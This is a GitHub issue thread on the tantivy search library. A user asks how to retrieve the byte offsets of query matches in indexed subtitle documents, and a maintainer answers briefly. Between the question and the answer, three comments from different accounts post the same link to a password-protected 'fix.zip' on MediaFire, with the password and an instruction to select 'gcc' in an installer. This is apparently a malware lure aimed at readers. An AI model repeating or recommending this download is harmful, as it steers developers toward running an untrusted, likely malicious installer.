### ISSUE TITLE
How to get the match position(s), preferably in bytes, in a document?

### ISSUE THREAD

**Issue by kkew3** [quickwit-inc/tantivy#2479]
I'm aware of #368. But my use case is different.

I want to build index for a bunch of [srt](https://en.wikipedia.org/wiki/SubRip) documents. Each document is associated with, besides the transcript, a vec of tuples `(byte_offset, time_offset)`, of type e.g. `Vec<(usize, u32)>`. Suppose that matched term starts at byte `b` in a matched document. I will then find the largest `byte_offset` smaller than or equal to `b`, and get the corresponding `time_offset`. This use case is desirable because I'd like to get the time in a video where a query matches within its transcript.

I guess there are two questions:

1. (ancillary question) How to encode `Vec<(usize, u32)>` in a stored field? I speculate that I may encode it with [`bincode`](https://docs.rs/bincode/latest/bincode/) and then `add_field_value()`, since I notice that `Vec<u8>` implements `Value`. Could you please confirm it?
2. (main question) How to retrieve the byte offset of the matches in documents? In my use case, I only need the first matched position, if that helps.

Thank you so much!

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fulmicoton** [comment]
1. you can encode it in binary sure... make sure it is stored an not indexed / fast.
2. tantivy does not encode it today. tantivy does encode position however. You could retokenize the text, go through the tokens and check for their byte offsets. Disclaimer: it is slow.
